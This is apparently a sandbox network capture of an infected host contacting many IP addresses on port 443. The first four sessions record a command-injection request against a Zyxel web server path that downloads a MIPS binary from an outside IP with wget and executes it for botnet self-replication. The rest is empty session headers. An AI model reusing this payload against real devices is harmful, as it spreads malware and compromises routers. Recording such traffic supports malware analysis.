                                                  Jan 19, 2024 18:24:17.494677067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9657192.168.2.1337904130.200.241.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:17.494730949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9658192.168.2.1349292142.208.198.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:17.494786978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9659192.168.2.1346186176.40.245.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:17.494821072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9660192.168.2.1349266212.73.191.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9661192.168.2.1356676216.204.229.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9662192.168.2.1358108164.63.170.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9663192.168.2.1340934138.65.30.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9664192.168.2.1360904118.215.69.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9665192.168.2.1352900116.156.73.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9666192.168.2.135292683.110.161.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9667192.168.2.135261634.205.131.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9668192.168.2.13429989.210.9.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9669192.168.2.1346174176.130.85.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9670192.168.2.1353596178.39.209.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9671192.168.2.134922671.163.253.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9672192.168.2.134521842.73.175.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9673192.168.2.1335594136.154.206.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9674192.168.2.1344042105.200.101.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9675192.168.2.133972872.164.3.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9676192.168.2.1353176142.16.113.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9677192.168.2.1355410110.126.190.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9678192.168.2.1339674211.158.45.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9679192.168.2.1350184139.138.25.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9680192.168.2.13359922.129.165.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9681192.168.2.1357220167.219.184.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9682192.168.2.1347472142.89.164.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9683192.168.2.134703260.155.60.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9684192.168.2.1340382146.136.154.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9685192.168.2.135753640.166.36.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9686192.168.2.135729451.204.193.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9687192.168.2.1353396149.107.92.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9688192.168.2.133489647.82.161.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9689192.168.2.13576488.77.217.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9690192.168.2.1334194174.98.136.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9691192.168.2.1360010116.114.114.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9692192.168.2.1334660136.28.238.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9693192.168.2.136098053.105.42.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9694192.168.2.135439831.249.24.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9695192.168.2.133417890.121.45.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9696192.168.2.1355294179.51.27.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9697192.168.2.1334508211.241.62.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9698192.168.2.1336612139.246.7.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9699192.168.2.1354516149.113.192.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9700192.168.2.134733854.109.87.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9701192.168.2.1351838181.164.72.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9702192.168.2.1351924173.167.250.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9703192.168.2.1338316194.119.100.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9704192.168.2.1350446150.216.91.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9705192.168.2.134964280.96.131.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9706192.168.2.1352194188.202.106.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9707192.168.2.1336234133.105.12.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9708192.168.2.1336480106.174.98.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9709192.168.2.1360894207.188.94.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9710192.168.2.135587614.195.34.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9711192.168.2.1358716184.1.14.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9712192.168.2.135495036.90.77.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9713192.168.2.1350746162.180.179.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9714192.168.2.135787818.217.26.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9715192.168.2.1342944220.175.202.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9716192.168.2.1359086204.207.38.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9717192.168.2.135817072.245.223.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9718192.168.2.133979438.68.203.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9719192.168.2.135609414.247.24.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9720192.168.2.134390054.16.167.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9721192.168.2.1343138102.222.148.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9722192.168.2.134280434.160.202.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9723192.168.2.1349614221.156.166.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9724192.168.2.133748658.151.196.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9725192.168.2.1342648197.172.10.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9726192.168.2.134513625.166.38.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9727192.168.2.1340330155.80.2.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9728192.168.2.1355186220.222.91.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9729192.168.2.1337410189.229.244.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9730192.168.2.1335804111.66.202.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9731192.168.2.1348842205.203.185.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9732192.168.2.135584848.191.211.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9733192.168.2.1353798121.175.145.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9734192.168.2.135381636.214.145.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9735192.168.2.1335914123.89.20.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9736192.168.2.1342474179.114.113.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9737192.168.2.135700875.3.65.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9738192.168.2.133878045.24.238.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9739192.168.2.1349374192.237.37.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9740192.168.2.1334914133.176.62.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9741192.168.2.1343816180.118.174.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9742192.168.2.1337148198.216.228.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9743192.168.2.1336582184.196.86.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9744192.168.2.1337718206.10.233.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9745192.168.2.133874490.39.184.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9746192.168.2.133542889.95.55.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9747192.168.2.1354532103.208.250.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9748192.168.2.1350966207.6.148.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9749192.168.2.1352546180.200.155.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9750192.168.2.133796067.209.24.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9751192.168.2.1342086191.30.218.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9752192.168.2.1348464153.96.181.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9753192.168.2.133480658.21.64.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9754192.168.2.1357138136.193.68.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9755192.168.2.1339116220.247.26.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9756192.168.2.136074041.213.247.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9757192.168.2.1336284219.29.44.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9758192.168.2.1355406223.234.22.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9759192.168.2.1351482114.62.186.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9760192.168.2.1360142159.118.100.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9761192.168.2.1335518108.82.4.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9762192.168.2.1354536154.179.70.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9763192.168.2.1341922162.102.50.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9764192.168.2.1349944217.253.165.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9765192.168.2.1351946171.209.47.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9766192.168.2.1358116136.87.120.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9767192.168.2.1344790171.130.123.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9768192.168.2.1350020184.189.179.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9769192.168.2.1335904117.232.133.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9770192.168.2.1355162186.255.208.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9771192.168.2.1341144110.192.18.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9772192.168.2.1346954117.208.183.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9773192.168.2.134808423.93.175.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9774192.168.2.1357456134.2.164.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9775192.168.2.1344472208.233.57.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9776192.168.2.1356272190.179.24.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9777192.168.2.133785831.33.254.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9778192.168.2.1345496124.140.93.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9779192.168.2.1352140199.109.201.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9780192.168.2.135461697.114.2.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9781192.168.2.135469697.94.149.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9782192.168.2.1335940178.194.249.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9783192.168.2.1341456111.189.142.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9784192.168.2.13415124.14.165.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9785192.168.2.135457485.237.140.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9786192.168.2.1341102204.85.2.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9787192.168.2.1336746122.221.142.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9788192.168.2.1347798149.67.10.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9789192.168.2.135581281.212.3.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9790192.168.2.1347648184.149.160.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9791192.168.2.1357888129.19.144.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9792192.168.2.1345948174.154.30.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9793192.168.2.1335012134.84.80.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9794192.168.2.134338057.63.16.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9795192.168.2.1340482139.79.77.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9796192.168.2.1350348173.20.202.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9797192.168.2.1339242116.135.19.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9798192.168.2.1358240144.251.19.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9799192.168.2.134415488.44.201.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9800192.168.2.135108277.13.88.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9801192.168.2.1343632176.16.183.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9802192.168.2.133389638.135.166.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9803192.168.2.1349960120.139.169.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9804192.168.2.1355220192.200.207.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9805192.168.2.1360756183.165.255.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9806192.168.2.133521669.253.96.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9807192.168.2.1338004213.41.58.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9808192.168.2.1336650115.128.188.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9809192.168.2.1352580217.165.181.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9810192.168.2.1336924168.26.89.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9811192.168.2.135592851.116.72.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9812192.168.2.1357738194.194.158.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9813192.168.2.1357162186.190.107.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9814192.168.2.1359396202.56.162.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9815192.168.2.1348048181.208.161.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9816192.168.2.134277478.40.6.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9817192.168.2.1349824139.78.234.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9818192.168.2.1344720216.156.24.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9819192.168.2.1352852105.104.200.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9820192.168.2.1353432106.29.235.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9821192.168.2.1348516220.76.238.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9822192.168.2.13543668.87.253.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9823192.168.2.133517423.125.87.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9824192.168.2.1341768161.24.168.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9825192.168.2.135455877.73.137.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9826192.168.2.1340006200.125.73.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9827192.168.2.1358886220.21.196.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9828192.168.2.1348184190.102.74.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9829192.168.2.1336970209.33.85.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9830192.168.2.1360254116.131.214.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9831192.168.2.1333922204.70.164.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9832192.168.2.1357496120.162.14.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9833192.168.2.1355384117.93.91.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9834192.168.2.1337266197.26.192.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9835192.168.2.1342424145.11.110.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9836192.168.2.133324281.111.28.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9837192.168.2.134071091.221.40.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9838192.168.2.1340238184.115.86.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9839192.168.2.134374277.193.78.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9840192.168.2.136033698.26.16.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9841192.168.2.133689452.127.68.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9842192.168.2.135867684.207.96.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9843192.168.2.1339214102.106.33.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9844192.168.2.1355402158.4.250.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9845192.168.2.135301485.8.216.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9846192.168.2.1343092221.51.167.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9847192.168.2.1347092139.197.68.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9848192.168.2.1341396117.192.92.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9849192.168.2.133655643.118.102.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9850192.168.2.1340812110.46.77.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9851192.168.2.1342982157.214.199.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9852192.168.2.1336460100.142.84.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9853192.168.2.1337964137.62.29.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9854192.168.2.1350470149.174.195.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9855192.168.2.1349530105.57.53.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9856192.168.2.1339504197.214.53.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9857192.168.2.1342336153.39.67.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9858192.168.2.1352838140.57.138.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9859192.168.2.1340344164.65.125.207443
